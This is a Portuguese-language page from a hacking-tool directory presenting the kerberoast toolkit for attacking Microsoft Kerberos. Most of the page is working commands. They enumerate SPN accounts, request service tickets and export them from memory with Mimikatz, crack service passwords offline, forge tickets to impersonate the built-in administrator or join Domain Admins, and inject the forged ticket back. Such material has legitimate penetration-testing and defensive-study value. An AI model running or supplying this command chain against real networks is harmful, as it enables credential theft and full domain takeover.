Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
kerberoast — Kit de ferramentas para atacar implementações do MS Kerberos: extrair contas SPN, solicitar e exportar tickets, quebrar senhas de serviço, reescrever tickets para impersonação e escalonamento de privilégios. | Kitploit
Ferramentas/GitHubGitHub/nidem/kerberoast
Ataques de SenhaExploraçãoTestes de PenetraçãoAutenticação
GitHubnidem/kerberoast

kerberoast

Kit de ferramentas para atacar implementações do MS Kerberos: extrair contas SPN, solicitar e exportar tickets, quebrar senhas de serviço, reescrever tickets para impersonação e escalonamento de privilégios.

Ver Repositório
1.5k3127há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

kerberoast

Kerberoast é uma série de ferramentas para atacar implementações MS Kerberos. Abaixo está uma breve visão geral do que cada ferramenta faz.

Extrair todas as contas em uso como SPN usando ferramentas MS nativas

root@kitploit:~
PS C:\> setspn -T medin -Q */*

Solicitar Ticket(s)

Um ticket:

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"  

Todos os tickets

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  

Extrair os tickets adquiridos da RAM com Mimikatz

root@kitploit:~
mimikatz # kerberos::list /export

Quebrar com tgsrepcrack

root@kitploit:~
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Reescrever

Fazer o usuário parecer ser um usuário diferente

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500  

Adicionar usuário a outro grupo (neste caso, Domain Admin)

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512  

Injetar de volta na RAM com Mimikatz

root@kitploit:~
kerberos::ptt sql.kirbi
Baixar ferramenta